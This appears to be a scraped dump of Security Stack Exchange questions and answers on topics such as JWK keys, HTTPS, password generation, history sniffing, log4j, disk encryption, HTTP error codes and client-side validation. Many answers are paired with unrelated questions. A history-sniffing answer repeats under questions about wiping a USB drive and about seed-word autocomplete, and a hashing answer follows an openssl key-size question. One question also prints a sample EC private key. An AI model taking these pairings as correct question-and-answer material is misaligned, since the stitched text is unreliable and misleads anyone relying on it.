Can I please get some help in understanding the representation/connection between the issuer key structure, such as the one here: { "kty": "EC", "d": "6RDoFJrbnJ9WG0Y1CVXN0EnxbuQIgRMQfzFVKogbO6c", "use": "sig", "crv": "P-256", "x": "eIA4ZrdR7IOzYRqLER9_JIkfQCAeo1QI3VCEB7KaIow", "y": "WKPa365UL5KRw6OJJsZ3R_qFGQXCHg6eJe5Nzw526uQ", "alg": "ES256" } And the actual elliptic curve Curve25519 which is supposed to satisfy the equation: y^2 = x^3+486662x^2+x Are the x and y above related to the x and y which I see in this equation? If so, in what way exactly? And how is the private key "d" connected to all this? How does the x+y on the curve related to the "d"? And the kid (key-id)? which is not even shown above. Why are they all 43 bytes long? And what format are above represented in? Also: I notice the QR code is 1776 bytes long: shc:/56762909510950603511292437..............656 Which gets translated to a "numeric" code of length 888: eyJ7aXAiOiKERUYiLREhbGciOiJFUzI1Ni.......xpW (How does one convert it as such?) which in turn gets to: {"zip":"DEF","alg":"ES256","kid":"Nlewb7pUrU_f0tghYKc88uXM9U8en1gBu88rlufPUj7"} And private key in X.509 format looks like this: -----BEGIN PRIVATE KEY----- MEECAQAwEwYHKoZIzj0CAQYIKoZIzj0DAQcEJzAlAgEBBCDpEOgUmtucn1YbRjUJ Vc3QSfFu5AiBExB/MVUqiBs7pw== -----END PRIVATE KEY----- Why 92 bytes? They are all related....just trying to understand how they are converted to one another and particularly to the equation of the curve? Thanks Steve
You should serve this data over HTTPS regardless. As Gh0stFish pointed out, you can simply use an S3 bucket policy to require this. There are a couple reasons for this: Using plain HTTP makes it very easy to perform traffic analysis. If I know that encrypted blob 123 is sensitive because I've already seen it or it comes from a site with sensitive information, I can see who else has downloaded this blob and associate the sensitive information with them. Unlike static encryption, TLS is usually configured to provide perfect forward secrecy. That is, once the connection has been torn down, the data cannot be recovered. HTTPS is now standard, and not using it, even for encrypted data, is often seen as irresponsible. If your customers inquire whether their data is served over HTTPS, you can simply say, "Yes," instead of having to explain why you don't and why it's still secure. HTTP/2, which can provide significant performance improvements, is only available over HTTPS in web browsers. I don't believe S3 currently supports HTTP/2, but if it does in the future, you'll need to be using HTTPS. HTTPS is fast. Most x86-64 systems will be able to handle encrypted data at speeds over 6 GiB/s on a single core, which is faster than a 10 Gb/s network card. Encryption is no longer the bottleneck that it once was, so there's little reason not to use it. HTTPS provides protection against tampering with the request. For example, if I as the attacker just saw client A request file 123 and I now see client B request file 456, I could substitute the response given to client A if the key is not unique. If I know file 123 is for a publicly available sex education site and client B is a large corporation, I could substitute material which, while not pornographic, might not be appropriate for a workplace.
{ "source": [ "https://security.stackexchange.com/questions/257080", "https://security.stackexchange.com", "https://security.stackexchange.com/users/270057/" ] }
257,082
E.g. if I were to register for a new website and am prompted for a password, my browser might generate a complicated password that looks like uv^2<YGYy}#Vj}=f which might be impossible to crack but also impossible to remember. Why such passwords instead of, say, AllThatIsGoldDoesNotGlitterNotAllWhoWanderAreLost which uses fewer characters but is much longer? The sheer length (49 characters) should also make it impossible to crack, but because it's a recognizable phrase it's also much easier to remember.
You say you want the browser to suggest a recognizable (which I take to mean coherent) phrase. Have you thought about how a browser would implement that? The browser cannot keep a long list of such phrases, because for the list to be even remotely secure, it would have to be ridiculously large. If the browser tries to use some sort of AI to create a coherent phrase on the spot, it would have to ensure that the algorithm does not have and does not develop any sort of bias. I'm not sure how hard of a task that is, but it's probably not worth the effort. Pulling the phrase from the internet would also not be acceptable to many people, for obvious reasons. A more practical alternative would be to generate xkcd style passphrases . However, these will probably not be as memorable as you might want, specially when you have dozens of them, for all the different sites you have accounts on. The only viable solution in the long run is to rely on password managers. And to a password manager, a complex password is a non-issue. So that's what the browsers do. Suggest complex passwords that have enough entropy to resist all sorts of password guessing attacks. And then save them in the browsers built-in password manager.
{ "source": [ "https://security.stackexchange.com/questions/257082", "https://security.stackexchange.com", "https://security.stackexchange.com/users/251562/" ] }
257,135
Suppose I am using a web browser to look at example.com . Now, from the same web browser tab, I enter example.org in the address bar and go to that completely different website operated by another entity. Does example.org know that the previous website I used was example.com ? I understand that example.org can look at the HTTP Referer header to know that I came from example.com if I clicked on a link on example.com to reach example.org . What if I manually entered the address in the address bar instead? Will example.org know the previous website I came from?
Do websites know which previous website I visited? There is no direct cross-site access to the browsers history. But there are ways to "probe" the history and thus detect previous access to a specific page or site. Techniques to do such cross-site detecting of the users browser history are known under the term "history sniffing". Apart from that, use of cross-site trackers and advertisement networks (Google Analytics and others) offer cross-site profiling of a user based on the users history. History sniffing basically works by observing side effects (usually timing differences) when including well known resources from other sites. This way one can detect if the user has visited a site or a specific page before, because the timing to load the resource might slightly differ if the resource was loaded from browser cache (i.e. page already visited) or if the server processing differed between the browser sending a cookie or not (i.e. site visited or not). Similar differences could be observed by including a resource from a HSTS-enabled site with plain HTTP and thus checking if the browser already knew about the HSTS enabled and thus directly accessed the site with HTTPS. Doing history sniffing got harder in the last years with at least some browsers focusing more on preserving the privacy and limiting cross-site interactions with history associated stored data (cache, cookies, ...), even at the cost of some performance loss (i.e. not loading data from cache cross-site). But it is still possible. To get some links about older techniques see Browser cache information disclosure or Workarounds for :visited CSS History reconnaissance on this site. Some newer paper in this regard are Cookies from the Past: Timing Server-side Request Processing Code for History Sniffing from 2020 and Browser history re:visited from 2018.
{ "source": [ "https://security.stackexchange.com/questions/257135", "https://security.stackexchange.com", "https://security.stackexchange.com/users/132550/" ] }
257,143
The data on my USB thumb drive is no longer accessible using a usual consumer computer (cf. https://superuser.com/questions/1687720 ). I wish to make sure that someone cannot extract data from it without having to take extraordinary measures (e.g. spending €million). How to damage the drive's data beyond (easy) recovery while maintaining the way the drive looks i.e., not damage the hull or otherwise destroy it physically on the macroscopic level. That is, no hammers, no nails, and no drills. Some reports on the web said that microwaving for 5 minutes didn't help and neither did simple immersion into water. How about boiling water? Perhaps, in a pressurized cooker? Or the freezer? I don't have 9V batteries at my disposal. Any further ideas using typical household or office items?
Do websites know which previous website I visited? There is no direct cross-site access to the browsers history. But there are ways to "probe" the history and thus detect previous access to a specific page or site. Techniques to do such cross-site detecting of the users browser history are known under the term "history sniffing". Apart from that, use of cross-site trackers and advertisement networks (Google Analytics and others) offer cross-site profiling of a user based on the users history. History sniffing basically works by observing side effects (usually timing differences) when including well known resources from other sites. This way one can detect if the user has visited a site or a specific page before, because the timing to load the resource might slightly differ if the resource was loaded from browser cache (i.e. page already visited) or if the server processing differed between the browser sending a cookie or not (i.e. site visited or not). Similar differences could be observed by including a resource from a HSTS-enabled site with plain HTTP and thus checking if the browser already knew about the HSTS enabled and thus directly accessed the site with HTTPS. Doing history sniffing got harder in the last years with at least some browsers focusing more on preserving the privacy and limiting cross-site interactions with history associated stored data (cache, cookies, ...), even at the cost of some performance loss (i.e. not loading data from cache cross-site). But it is still possible. To get some links about older techniques see Browser cache information disclosure or Workarounds for :visited CSS History reconnaissance on this site. Some newer paper in this regard are Cookies from the Past: Timing Server-side Request Processing Code for History Sniffing from 2020 and Browser history re:visited from 2018.
{ "source": [ "https://security.stackexchange.com/questions/257143", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
257,150
As the image below shows, when you try to restore an existing wallet from a seed (a sequence of 12 words), the program offers some autocomplete suggestions. Though I'm sure the risk is purely theoretical – in the sense that the number of permutations is high enough to make any attempt at guessing practically impossible – isn't it, still, a theoretical security risk? What exactly is the benefit of offering autocomplete for a word seed sequence, since it's predicated not on memorization but on safe keeping (ideally on a piece of paper) ? Just to make it absolutely clear, the image was taken from Github, and (I assume!) it only serves as an example and does not reflect an actual wallet
Do websites know which previous website I visited? There is no direct cross-site access to the browsers history. But there are ways to "probe" the history and thus detect previous access to a specific page or site. Techniques to do such cross-site detecting of the users browser history are known under the term "history sniffing". Apart from that, use of cross-site trackers and advertisement networks (Google Analytics and others) offer cross-site profiling of a user based on the users history. History sniffing basically works by observing side effects (usually timing differences) when including well known resources from other sites. This way one can detect if the user has visited a site or a specific page before, because the timing to load the resource might slightly differ if the resource was loaded from browser cache (i.e. page already visited) or if the server processing differed between the browser sending a cookie or not (i.e. site visited or not). Similar differences could be observed by including a resource from a HSTS-enabled site with plain HTTP and thus checking if the browser already knew about the HSTS enabled and thus directly accessed the site with HTTPS. Doing history sniffing got harder in the last years with at least some browsers focusing more on preserving the privacy and limiting cross-site interactions with history associated stored data (cache, cookies, ...), even at the cost of some performance loss (i.e. not loading data from cache cross-site). But it is still possible. To get some links about older techniques see Browser cache information disclosure or Workarounds for :visited CSS History reconnaissance on this site. Some newer paper in this regard are Cookies from the Past: Timing Server-side Request Processing Code for History Sniffing from 2020 and Browser history re:visited from 2018.
{ "source": [ "https://security.stackexchange.com/questions/257150", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
257,611
I've seen some similar questions but maybe not exactly what I'm asking. Also I can't say that I've followed all the technical jargon in previous posts and am really after more of an intuitive understanding. So let's say I'm allowed ten characters. The usual requirement is to use numbers, symbols, etc. But why is #^Afx375Zq more secure than aaaaaaaaaa ? The hacker doesn't know that I've repeated a character ten times, so doesn't he still have to go through the testing of all possibilities or are things like repeated characters tested first? Similarly, suppose I use a 21-character passphrase such as I like Beatles' songs. Now someone might say that that's a common type of statement but again the hacker doesn't know that I'm using a passphrase instead of DD63@*()ZZZ125++dkeic so why is it (I assume) less secure? Are passphrases tested first?
If you were to generate a totally random password that is 10 letters long and can contain lower and upper case letters, numbers and common symbols, then you are equally likely to come up with #^Afx375Zq as you are aaaaaaaaaa . So from that point of view you're right that the passwords are equally secure. However, most passwords are not generated randomly. They are chosen by humans, and humans don't pick a completely random series of characters. They choose something that they will be able to remember, and clearly the second password is much easier to remember than the first. Therefore, if you take a large enough database of user accounts, you are likely to find that far more of them have chosen your second password than your first. As an attacker I can use that knowledge, so I'll test easy to remember passwords first.
{ "source": [ "https://security.stackexchange.com/questions/257611", "https://security.stackexchange.com", "https://security.stackexchange.com/users/247762/" ] }
257,795
Assuming a product shelf life of 30 years and the product which is released now in 2021, what is the recommendation/suggestion for hashing or encryption algorithms to use in the product? That means, should I directly make use of the superior algorithms(SHA-512 for hashing, AES-256 for encryption) or should this be driven by SAL(Security Assurance Level) or any other different factors? Also, are there any recommendations from NIST to choose these based on the product's shelf life?
Using SHA-512 and AES-256 as you suggest is generally not wrong. But this may change in the future. In detail: It depends on the usecase. Do you need a block cipher or a stream cipher? Do you want to hash passwords or something else? There are multiple possible algorithms available. It is required to use appropriate functions, and not outdated/broken functions. But maybe even more important: Every algorithm can be broken in the future. So it is very important that your product has the ability to be updatable and introduce new hash-/encryption-algorithms which replace the old ones.
{ "source": [ "https://security.stackexchange.com/questions/257795", "https://security.stackexchange.com", "https://security.stackexchange.com/users/247172/" ] }
257,834
Our project is to apply digital signature to PDF, so each user should have their own key pairs and a certificate. To keep key securely, we plan to purchase HSM, but from what I understand HSM have a limited number of keys that it can store. So to my question, how should we handle this situation that we have hundreds or thousands of users that need to store their own keys and certificates. One idea that I have: Generate a master key in HSM Generate user keys outside of HSM Encrypt user key with master key Store encrypted user key But I’m not sure if this is the best practice. Thank you.
Using SHA-512 and AES-256 as you suggest is generally not wrong. But this may change in the future. In detail: It depends on the usecase. Do you need a block cipher or a stream cipher? Do you want to hash passwords or something else? There are multiple possible algorithms available. It is required to use appropriate functions, and not outdated/broken functions. But maybe even more important: Every algorithm can be broken in the future. So it is very important that your product has the ability to be updatable and introduce new hash-/encryption-algorithms which replace the old ones.
{ "source": [ "https://security.stackexchange.com/questions/257834", "https://security.stackexchange.com", "https://security.stackexchange.com/users/271226/" ] }
257,873
Log4j has been ported to other languages, such as log4perl, log4php, log4net, and log4r. Are these ports vulnerable to CVE-2021-44228 as well? I believe that they aren't because the vulnerability uses JNDI (Java Naming and Directory Interface), which I doubt would be relevant in other languages.
That CVE does not impact the ports, only Log4j, since it requires the use of Java interfaces (and some JVM versions prevent the vulnerability from being exploited). It may be that the ports have similar vulnerabilities, but they would likely be of a substantially different nature such that we would issue a different CVE for them to help distinguish the vulnerabilities, patching, and remediation steps.
{ "source": [ "https://security.stackexchange.com/questions/257873", "https://security.stackexchange.com", "https://security.stackexchange.com/users/129883/" ] }
257,943
According to the notes for CVE-2021-44228 at mitre.org: Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html ) protects against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false". Therefore, assuming the defaults are in place, are my web facing applications protected from the threat this vulnerability introduces if the application is running on JRE/JDK 8u121 or newer?
No, you really need to update log4j. Here is an excerpt from LunaSec's announcement : According to this blog post (see translation ), JDK versions greater than 6u211 , 7u201 , 8u191 , and 11.0.1 are not affected by the LDAP attack vector. In these versions com.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot load remote code using LDAP. However, there are other attack vectors targeting this vulnerability which can result in RCE. An attacker could still leverage existing code on the server to execute a payload. An attack targeting the class org.apache.naming.factory.BeanFactory , present on Apache Tomcat servers, is discussed in this blog post . It looks like the change in 8u121 helped, but it does not entirely prevent an RCE. The recommendation is to upgrade log4j and not trust a Java update to fix it.
{ "source": [ "https://security.stackexchange.com/questions/257943", "https://security.stackexchange.com", "https://security.stackexchange.com/users/219895/" ] }
258,266
Proper security algorithms demand true random numbers. For instance, secret keys & initialization vectors should never not be true random. However, generating numbers using Java's Random library or C's srand() initialization & then rand() are only able to generate pseudorandom numbers. From what I understand, since functions like srand() gather the seed from some source such as system time, and the 24 hours time is cyclical, it is not truly random. Please correct me if this assumption is flawed. Also, an example of a truly random number would be if we use a seed from let's say an audio file, and picked a pseudorandom place in the file and then get the audio frequency at that location. Since only the location was pseudorandom but the frequency at that location was not, the value is truly random. Please correct me if this assumption is flawed. Finally, apologies for compounding the question further, exactly how vulnerable would it really leave systems if pseudorandom values are used? I have learned that AES 128 is actually enough to secure systems ( Is 128-bit security still considered strong in 2020, within the context of both ECC Asym & Sym ciphers? ). For military standards, 192 & 256 were adopted ( Why most people use 256 bit encryption instead of 128 bit? ). Is using true random values also akin to following such baseless standards, or is it actually crucial?
There is a (common) misconception in this question that there is such a thing as “true” randomness and that this matters for security. In fact, whether “true” randomness exists is a philosophical question (physics gives a partial answer), which is not relevant for security. There are many notions of randomness. What is relevant for security is unpredictability . Security is defined as protecting against adversaries. A value is “random”, for security purposes, if your adversary cannot find or guess it. In the context of security, “true random” is sometimes used to mean a value is based on some physical process that no adversary can reproduce. For example, a coin flip is generally truly random in that sense. But not if the coin is too heavily biased, and not if the adversary can see the result of the coin flip. Performing 128 coin flips in front of a camera will not give you a secure 128-bit random number. (It does give you a value that cannot be predicted in advance, which is good for a few things but not good, for example, as a cryptographic key.) Conversely, a value which is calculated in a deterministic way by a cryptographically secure pseudorandom generator (CSPRNG) is perfectly fine as a random value, as long as adversaries cannot learn the seed or the internal state of the random generator. The fact that only deterministic physical processes were involved other than the generation of the seed, and that the same seed was used to generate other random values, do not compromise the security of the random value (assuming that the CSPRNG was correctly designed and implemented — an assumption that holds for any secure processing). “True” randomness is necessary for security because you have to seed the CSPRNG somehow. You can seed a CSPRNG with the output of a CSPRNG, but ultimately, you have to start somewhere with a non-deterministic or non-sufficiently-precisely-modeled physical process. A random value is only good enough if it's sufficiently unpredictable. If I tell you that I picked my secret key at random between 12729af5a51075a68db9d4b05ce7981a and fc42099f25ee1eb5a8dc1178c35868b8 , that's not good for me: I did in fact generate those two values randomly, and you don't know which one it is, but you can still find it in at most two guesses. The measure of unpredictability or unknownability of a value is called entropy (beware that there are many related, but distinct concepts called entropy ). A fully known value has an entropy of 0. A value which has equal chances of being one of two known possibilities has an entropy of 1. By telling you that my key is one of these two values, I've reduced its entropy to at most 1 bit, no matter how randomly those two values were generated. An audio file may or may not have a large amount of entropy. At one extreme, if the adversary has the same file, the entropy is 0. If the adversary has a different recording of the same sound, there may be artifacts due to the microphone quality and placement, but audio compression would tend to remove these artifacts. Microphone white noise can be a decent source of entropy, but you should get it directly from the hardware: by the time you get a recording, it's hard to make sure that the noise has been preserved and that the same noise hasn't been copied somewhere else. The problem with rand() functions in the standard library of most programming languages is not that they're pseudorandom, but that they're not cryptographically secure for two major reasons: The adversary can find the seed. For example srand(time()) is mostly predictable (depending on how precisely the adversary knows when your application ran – this has nothing to do with time-of-day being cyclical). And even if the adversary doesn't know the seed, if the seed is a 32-bit number, it's easy for the adversary to try all possible seeds by brute force. If it's a 64-bit number, it's costly but still doable. Outputs are not independent: given enough outputs from rand() , it's possible to calculate other outputs. Secure random generators, such as /dev/urandom or CryptGenRandom , have neither of these flaws: they use a CSPRNG algorithm (which guarantees independent outputs) from a secure seed (which, in modern computers, can be generated from a component in the main CPU).
{ "source": [ "https://security.stackexchange.com/questions/258266", "https://security.stackexchange.com", "https://security.stackexchange.com/users/271939/" ] }
258,637
What is this restriction for in terms of safety? And when connecting external drives via USB, the root password is not required. I can't understand the logic. I use the following rule in the fstab to connect the internal drive at runtime: LABEL=disk /media/user/disk ext4 rw,nosuid,nodev,noexec,discard,relatime,user How would such a rule add vulnerability?
Mounting filesystems has multiple very high security risks, and should not be taken lightly. Having said that, there are multiple tools (like udisks and the user option in fstab) that run with elevated privileges and try to mitigate risks while allowing users to mount disks. Most of the mitigations work by carefully controlling mount options. Here is a short (and incomplete) list of possible risks: a maliciously malformed filesystem could cause the system to crash or trigger buffer overrun errors in the kernel (mitigation: run filesystem check first and reject or repair malformed filesystems) a maliciously populated filesystem could include setuid binaries or devices with open permissions that would allow privilege escalation (mitigation: mount with nosuid,nodev and possibly noexec) mount options can allow mounting of existing partitions while forcing file ownership changes via mount options (mitigation: restrict users from supplying mount options) mount can replace existing system directories (mitigation: only allow user triggered mounts on special designated directories) unmounting arbitrary filesystems could cause a denial of service attack (mitigation: only allow user mounted filesystems to be user unmounted) To summarize, mount is a system critical function and its effects can severely impact system integrity and security, so it should only be allowed by non-admin users in extremely restricted conditions.
{ "source": [ "https://security.stackexchange.com/questions/258637", "https://security.stackexchange.com", "https://security.stackexchange.com/users/272464/" ] }
258,780
From the way I understand it, at-rest encryption is used to protect data when it's being stored at a datacenter so that if someone manages to get data they shouldn't have, they don't have anything useful. But regardless of what type of encryption is being used, the key (or some other method) also has to be stored somewhere - readily accessible for decryption. So, wouldn't it be simple for someone to just undo the encryption? Given they already gained access. Am I just not getting how it works or is there some other concept I'm not taking into consideration?
Yes, it's worth it, by far. Computers get stolen. If the hard disk is encrypted, the thief ends up only with hardware, and hardware is cheap to replace. If the disks aren't encrypted, the thief has the hardware and the data. Depending on what kind of data, the company can lose intellectual property, industry secrets, HR data, and that can translate into huge fines (or dead people, if the data is the real names of CIA operatives ). USB devices are easy to forget, or to misplace. If they are encrypted, and the key is stored on the computer, there's nothing on the drive that can be read. Full disk encryption indeed keeps the key on the system, but the key is password protected, and the password is not on the system. Bruteforcing the password is possible, but depending on the length of it, can take way more time than the data is interesting (think taking 1000 years to crack it). High security systems keep the keys on a TPM or a smartcard. The first has pretty secure settings, and capturing data from inside a TPM is not remotely easy to achieve. And a smartcard usually is not stored with the computer, and usually is protected by a PIN and auto erases itself in case of a bruteforce attempt. There are LUKS settings (for Linux computers) that don't even keep the encrypted header on the disk, but it resides on a USB drive. In the case of theft, there is nothing to be bruteforced, because the header is on another hardware, probably with the user.
{ "source": [ "https://security.stackexchange.com/questions/258780", "https://security.stackexchange.com", "https://security.stackexchange.com/users/272786/" ] }
258,785
I'm working on a REST API endpoint where we only accept requests from certain domain names. Whitelisting. A dev I'm working with recommended that we return HTTP 400 instead of HTTP 403 if the incoming IP address is not whitelisted. They said it was because we don't want to disclose any unnecessary information. Is this a common security practice? If so, what is the point of the other HTTP error codes (4xx)? Is there ever a scenario where it's safe to return specific error codes?
There is a trade-off between two requirements: what to reveal to help the user and as aid in debugging and what to hide from the user as another layer in defense. Returning 400 "bad request" instead of a more specific error code is definitely misleading since this error code is related to malformed requests. It will confuse attackers but it will also confuse intended users of your system, thus possibly decrease customer satisfaction and increase your support costs. The problems of too generic error messages can be seen with TLS, where one often only gets a generic "handshake failure" which makes it very hard to figure out what the underlying problem is. Returning 403 "forbidden" with a very specific reason like "not on source IP whitelist" might reveal too much information about this layer of protection though. A generic 403 instead just means that there is access control and does not reveal anything about its details. This might be a good trade-off between not revealing too much internals and allowing focused debugging of problems. Apart from that there are specific error codes which trigger actions in clients: 401 and 407 will (in interactive use) lead to prompting for authentication credentials, so they should not be simply replaced with a plain 400 when authentication is requested.
{ "source": [ "https://security.stackexchange.com/questions/258785", "https://security.stackexchange.com", "https://security.stackexchange.com/users/272799/" ] }
258,911
Yes, the transfer to the script via arguments is visible through ps -ax , /proc/<pid>/cmdline etc., BUT if someone has already gained access to your account from the outside (e.g. by hacking your browser) he will have no trouble looking not only ps -ax , but also periodically intercept /proc/<pid>/fd/0 (once intercepted, second skipped, to be less suspicious). But this is nothing, because if an intruder got access to your account, it will not be difficult for him to just run keylogger (to listen to x11 server) and intercept keystrokes. I am currently writing a script that runs through sudo (root) and accepts sensitive data. When sending them directly (as arguments) to a script, I can hard restrict the characters used in the arguments with sudo ( user ALL = (root) NOPASSWD: /bin/program [0-9][0-9a-z][0-9a-z]... ) so that an attacker cannot use special character combinations to bypass the restriction and thus gain root access. When getting data through the pipe (stdin), I will also of course filter data: #!/bin/sh pass=$(dd if=/dev/stdin bs=1 count=10 2>/dev/null | tr -cd [:alnum:]) , but I consider simple rules of restriction of arguments through sudo safer (also in the script itself there will be additional checking). So is there a fundamental difference between passing through stdin or arguments?
/proc/<pid>/fd/0 can only be read by the process owner and root. /proc/<pid>/cmdline can be read by all users.
{ "source": [ "https://security.stackexchange.com/questions/258911", "https://security.stackexchange.com", "https://security.stackexchange.com/users/272464/" ] }
259,089
I've been researching on virtual machine security and found a lot of articles detailing how an infected VM is isolated (or not) from the host machine. But I couldn't find any answers to the opposite side of the question. If my host is infected, can I safely run some operation inside of a VM? How would that work?
The initial question asks "Will the VM be infected?", which is asking to predict the future, which is not possible for anyone on this site to do. So instead, I will answer "Can the VM be infected?" The reason why you read a lot about VM isolation is because the VM is, in essence, just a process on the host machine, similar to Chrome, VLC or any game you may be playing. A VM process just happens to be a lot more complex, but in essence, the VM is less privileged than your host's operating system. It would be nonsensical if the VM could somehow "overrule" the host's operating system. But this paints a clear picture: The host OS is more privileged than the guest OS. If malware infects the host, then an attacker may be able to run commands with elevated privileges (root on UNIX systems, SYSTEM on Windows, etc.), or even run with kernel privileges. If that is the case, then the VM can be modified and infected at will by an attacker. After all, the VM is just a process, running in the same compromised environment.
{ "source": [ "https://security.stackexchange.com/questions/259089", "https://security.stackexchange.com", "https://security.stackexchange.com/users/273336/" ] }
259,383
Does HTTPS have any unique mechanisms that protect web servers from exploits run by a malicious client (eg. SQL injection, specific browser exploits etc.)? My current understanding is that HTTPS is simply a HTTP session run over a TLS 1.2/1.3 tunnel (ideally), and wouldn't protect against any vulnerabilities of the client/server applications running on either end. Is it correct that TLS only protects against MiTM and that browsers/web servers must be regularly patched to protect against all other exploits?
You are correct; TLS provides no protection at all against malicious clients. You can think of TLS as providing a tunnel between the client and server. What's going through the tunnel is protected against attack from outside the tunnel , but it doesn't control what goes through the tunnel at all. Therefore, it doesn't protect against attacks launched through the tunnel (in either direction).
{ "source": [ "https://security.stackexchange.com/questions/259383", "https://security.stackexchange.com", "https://security.stackexchange.com/users/249225/" ] }
259,408
I'm working with some middleware that requires username/password authentication. The middleware uses MD5 hash for the password. The MD5 hash, of course, is not fit for the purpose of storing passwords. We need to address this. We tried modifying the middleware to use a newer hash but it is a crap system we can't really change easily. However, we can control the web site that sits on top of it, and it's easy to change its code. So one of our developers had this idea: When the user registers, the web site generates its own salt, then hashes the password with SHA-256 before passing it to the middleware. The middleware will then hash the password again using MD5 and its own salt. When the user signs on, the web site retrieves its own salt then attempts to recreate the SHA-256 hash from the password that the user typed in. The web site then passes the SHA-256 hash to the middleware for validation. The middleware retrieves its own salt and attempts to recreate the MD5 hash from the salt and the SHA-256 that was passed in. If they match, the signon attempt is successful. By combining the hashes in this manner, will my site be as secure as if were using the SHA-256 hash alone? Or does double hashing create some kind of vulnerability?
Yes, combining hashes in this fashion will increase the overall security of password storage on the website, mostly by the use of salted SHA-256 hashing. The final MD5 digest has little effect but does nominally improve security. However, the described scheme is not very strong . The main problem is that if an attacker gains access to the hashed passwords and learns this scheme of password protection they can easily start searching for common passwords and brute forcing the entire set. Because both SHA-256 and MD5 are so cheap to compute it may be feasible to recover several passwords. SCrypt would be a much better choice than a SHA digest because of relative cost of computation. (BCrypt would be a good choice too but is infeasible due to the final MD5 preventing verification.) Another simple improvement above what is described would be to perform many (thousands) of SHA-256 (or larger) digests to make it cost prohibitive to search the space but not unduly expensive (say, a few hundred milliseconds) to verify a single password.
{ "source": [ "https://security.stackexchange.com/questions/259408", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34115/" ] }
259,427
I was wondering if it is possible for openssl to check the server public key size. Currently, I am connecting to the server using: openssl s_client -connect "ip address":"port" -key client.key -cert client.crt -CAfile myCA.crt -verify 10 -verify_return_error This is on the client side. The server has been set with a weak server key (1024). I was hoping that there is a one-line solution for rejecting the server because of its weak server key.
Yes, combining hashes in this fashion will increase the overall security of password storage on the website, mostly by the use of salted SHA-256 hashing. The final MD5 digest has little effect but does nominally improve security. However, the described scheme is not very strong . The main problem is that if an attacker gains access to the hashed passwords and learns this scheme of password protection they can easily start searching for common passwords and brute forcing the entire set. Because both SHA-256 and MD5 are so cheap to compute it may be feasible to recover several passwords. SCrypt would be a much better choice than a SHA digest because of relative cost of computation. (BCrypt would be a good choice too but is infeasible due to the final MD5 preventing verification.) Another simple improvement above what is described would be to perform many (thousands) of SHA-256 (or larger) digests to make it cost prohibitive to search the space but not unduly expensive (say, a few hundred milliseconds) to verify a single password.
{ "source": [ "https://security.stackexchange.com/questions/259427", "https://security.stackexchange.com", "https://security.stackexchange.com/users/274015/" ] }
259,903
I asked a question about HTTPS encryption as it relates to developing a web app here . On the face of it that question has now been closed twice for not being focused enough, but if the meta discussion is anything to go by, it's more realistically because of my wrong assumptions about the topic. An exchange in the comments with another user revealed this: There is no such thing as "just encrypted in transit", that's simply a confusion from you. You are confused about how HTTPs works, which is the reason for this question and its many misconceptions. Good luck in the future :) This goes against what I've always assumed, so I did some further research and it seems that at least some people consider HTTPS to be encryption in transit, and consider encryption in transit to be distinct from end-to-end encryption. So which is true? Is encryption in transit a completely different concept to end-to-end encryption, or are they the same thing?
Some definitions: Encryption in transit means that data is encrypted while transiting from one point to another. Typically between one client and one server. End-to-end encryption means that data is encrypted while in transit from its original sender and the intended final recipient. Typically between one client to another client, the routing servers only see the encrypted data without being able to decrypt it. Encryption at rest is when data is stored encrypted. Depending on the context, this can be on the client, the server, both of them or only one of them. HTTPS (and TLS) only provide encryption in transit . It is not suited for end-to-end encryption. A second layer of encryption on top of HTTPS is usually used to provide end-to-end encryption.
{ "source": [ "https://security.stackexchange.com/questions/259903", "https://security.stackexchange.com", "https://security.stackexchange.com/users/120534/" ] }
260,116
Let's say that I have a single-page web app written in JavaScript and a server-side API, both changeable by me. The app calculates some values based on user input and POSTs these to the API. The values are based on user input but do not contain user input. For instance it might ask the user to pick A or B based on radio buttons, then send their choice to the server. There is no session, and the user is anonymous. Rule #1 is Never Trust User Input. A malicious user could modify the payload, and change "A" to "C" (not one of the choices). I don't want that to happen. For simple cases there is an obvious solution: validate the input server-side. If it's not "A" or "B", reject it. In a complex app, though, the number of possible permutations could make validation very difficult. The app could digitally sign the calculated payload before sending it, but as the JavaScript is available to the client, a user could obtain both the key and the algorithm. Obfuscation isn't sufficient here. Has anyone come up with any way to prevent this sort of tampering? Time-based keys provided by the server? Web3? Or is there a formal proof that it is impossible (aside from server-side validation against a set of input constraints)?
TL,DR: It's impossible to do so client side. Client side validation is just a client convenience, not useful to really validate anything. You don't want the client to mistype his email, putting an invalid char somewhere, and have to wait the form being submitted, the server parsing it, and sending back an error 5 seconds later, you want the error to show instantly. You validate on the client, but you ignore the client validation entirely and validate again on the server. If the validation is made client-side, the client may submit the request by hand, bypassing all validation. Even if you use hashing, signing, obfuscating or anything else, the result is an HTTP request and the client can intercept it and tamper it. If your use case is what you asked, server validation it's not difficult at all. Have a table with all questions and all valid answers, and check every client answer with the table. On the first invalid answer you stop the processing and send back an empty page. the number of possible permutations could make validation very difficult. You have to choose between server-side (from trivial to very difficult) and client side (not possible at all). I believe the choice is easy.
{ "source": [ "https://security.stackexchange.com/questions/260116", "https://security.stackexchange.com", "https://security.stackexchange.com/users/22022/" ] }
260,120
I read this post but I want to know more details. I know that Google uses a Windows' function called CryptProtectData to encrypt user passwords on Windows and Google only stores the encrypted forms of password on its database and does not know the encryption keys. So now my question is how the Sync actually works then!!! I mean how can I view my passwords on android device for example? To make my question more general, I want to know the work flow of such apps and password manager which claim to preserve privacy while protecting your data and more interestingly working on multiple platforms
TL,DR: It's impossible to do so client side. Client side validation is just a client convenience, not useful to really validate anything. You don't want the client to mistype his email, putting an invalid char somewhere, and have to wait the form being submitted, the server parsing it, and sending back an error 5 seconds later, you want the error to show instantly. You validate on the client, but you ignore the client validation entirely and validate again on the server. If the validation is made client-side, the client may submit the request by hand, bypassing all validation. Even if you use hashing, signing, obfuscating or anything else, the result is an HTTP request and the client can intercept it and tamper it. If your use case is what you asked, server validation it's not difficult at all. Have a table with all questions and all valid answers, and check every client answer with the table. On the first invalid answer you stop the processing and send back an empty page. the number of possible permutations could make validation very difficult. You have to choose between server-side (from trivial to very difficult) and client side (not possible at all). I believe the choice is easy.
{ "source": [ "https://security.stackexchange.com/questions/260120", "https://security.stackexchange.com", "https://security.stackexchange.com/users/248448/" ] }
260,130
